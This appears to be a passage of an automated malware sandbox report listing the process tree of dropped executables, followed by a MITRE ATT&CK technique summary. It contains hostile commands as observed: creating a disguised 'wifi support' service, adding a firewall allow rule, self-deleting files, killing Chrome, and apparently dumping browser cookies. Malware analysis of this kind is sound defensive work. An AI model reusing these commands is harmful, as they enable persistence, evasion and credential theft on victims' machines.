C:\Windows\SysWOW64\taskkill.exetaskkill /im 5806.exe /f3⤵
- Kills process with taskkill
PID:4220
-
-
-
C:\Users\Admin\AppData\Local\Temp\5CF8.exeC:\Users\Admin\AppData\Local\Temp\5CF8.exe1⤵
- Executes dropped EXE
PID:4720 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bmvfvvhv\2⤵PID:4980
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\pueztfce.exe" C:\Windows\SysWOW64\bmvfvvhv\2⤵PID:5096
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create bmvfvvhv binPath= "C:\Windows\SysWOW64\bmvfvvhv\pueztfce.exe /d\"C:\Users\Admin\AppData\Local\Temp\5CF8.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:4392
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description bmvfvvhv "wifi internet conection"2⤵PID:4400
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start bmvfvvhv2⤵PID:4640
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:4296
-
-
C:\Users\Admin\AppData\Local\Temp\615E.exeC:\Users\Admin\AppData\Local\Temp\615E.exe1⤵
- Executes dropped EXE
PID:4748 -
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\615E.exe2⤵PID:4728
-
C:\Windows\SysWOW64\timeout.exetimeout /t 33⤵
- Delays execution with timeout.exe
PID:4368
-
-
-
C:\Users\Admin\AppData\Local\Temp\6D17.exeC:\Users\Admin\AppData\Local\Temp\6D17.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4876
-
C:\Users\Admin\AppData\Local\Temp\76AD.exeC:\Users\Admin\AppData\Local\Temp\76AD.exe1⤵
- Executes dropped EXE
PID:1060 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.1 -n 3 > nul & del ""2⤵PID:3696
-
-
C:\Windows\SysWOW64\bmvfvvhv\pueztfce.exeC:\Windows\SysWOW64\bmvfvvhv\pueztfce.exe /d"C:\Users\Admin\AppData\Local\Temp\5CF8.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4348 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies service
- Modifies data under HKEY_USERS
PID:3900
-
-
C:\Users\Admin\AppData\Local\Temp\8072.exeC:\Users\Admin\AppData\Local\Temp\8072.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4808
-
C:\Users\Admin\AppData\Local\Temp\8B60.exeC:\Users\Admin\AppData\Local\Temp\8B60.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5104
-
C:\Users\Admin\AppData\Local\Temp\94D7.exeC:\Users\Admin\AppData\Local\Temp\94D7.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:720 -
C:\Users\Admin\AppData\Local\Temp\94D7.exeC:\Users\Admin\AppData\Local\Temp\94D7.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4124
-
-
C:\Users\Admin\AppData\Local\Temp\A64D.exeC:\Users\Admin\AppData\Local\Temp\A64D.exe1⤵
- Executes dropped EXE
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
PID:4940
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
PID:4756
-
-
C:\Users\Admin\AppData\Local\Temp\AD53.exeC:\Users\Admin\AppData\Local\Temp\AD53.exe1⤵
- Executes dropped EXE
PID:3200 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:4112
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
PID:4884
-
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
6Web Service
1